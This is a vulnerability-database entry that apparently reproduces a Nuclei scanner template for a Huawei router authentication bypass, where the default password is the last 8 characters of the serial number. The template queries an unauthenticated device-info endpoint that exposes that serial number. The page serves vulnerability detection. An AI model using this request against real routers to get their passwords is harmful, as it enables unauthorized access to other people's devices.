huawei-router-auth-bypass: Huawei Router - Authentication Bypass

日期: 2025-08-01 | 影响软件: Huawei Router | POC: 已公开

漏洞描述

Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device.

PoC代码[已公开]

id: huawei-router-auth-bypass

info:
  name: Huawei Router - Authentication Bypass
  author: gy741
  severity: critical
  description: Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device.
  reference:
    - https://www.exploit-db.com/exploits/48310
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-288
  metadata:
    max-request: 1
  tags: auth-bypass,router,edb,huawei,vuln

http:
  - raw:
      - |
        GET /api/system/deviceinfo HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Referer: {{BaseURL}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "DeviceName"
          - "SerialNumber"
          - "HardwareVersion"
        condition: and
# digest: 4a0a004730450220608c53c5c239a986be9f5e310baf9b598405b094bd75cac47bd2a38934a268ca022100fb46e253b836c1ba25d0985589b52e046a86c73d2aa93957c39c315137182bdc:922c64590222798bb761d5b6d8e72950

相关漏洞推荐